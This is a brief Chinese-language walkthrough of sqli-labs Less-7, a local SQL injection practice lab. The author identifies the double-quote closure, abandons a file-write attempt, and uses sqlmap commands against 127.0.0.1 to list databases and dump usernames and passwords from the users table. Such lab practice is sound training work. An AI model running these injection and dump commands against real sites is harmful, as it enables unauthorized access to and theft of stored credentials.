less7

闭合类型

 双引号，然后看到回显了一个use oufile，查了一下，好像是用sql语法进行文件上传。

 用锤子，烦死了，上传了一万年，权限不够，又找不到那个提权的文件在哪。真醉了，直接给他sqlmap一把梭了。

python sqlmap.py -u "http://127.0.0.1/sqli-labs-master/Less-7/?id=1""

 首先就是可以查询他的注入情况。

看到可以通过布尔盲注和延时注入进行攻击

python sqlmap.py -u "http://127.0.0.1/sqli-labs-master/Less-7/?id=1"" -dbs

 爆库

 爆表

 列

python sqlmap.py -u "http://127.0.0.1/sqli-labs-master/Less-7/?id=1%22" -D security -T users -C username -dump

 python sqlmap.py -u "http://127.0.0.1/sqli-labs-master/Less-7/?id=1%22" -D security -T users -C password -dump

 爆字段